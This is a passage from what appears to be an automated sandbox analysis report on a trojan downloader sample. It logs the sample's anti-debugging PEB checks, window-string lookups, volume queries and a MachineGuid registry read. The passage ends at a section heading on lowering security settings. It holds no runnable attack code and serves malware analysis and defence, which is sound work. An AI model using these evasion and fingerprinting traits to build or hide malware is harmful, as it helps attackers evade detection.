          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AA3022 mov eax, dword ptr fs:[00000030h]1_2_00AA3022
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AA0467 mov eax, dword ptr fs:[00000030h]1_2_00AA0467
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AA273F mov eax, dword ptr fs:[00000030h]1_2_00AA273F
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB36E3 mov eax, dword ptr fs:[00000030h]1_2_00AB36E3
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB2E00 mov eax, dword ptr fs:[00000030h]1_2_00AB2E00
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings: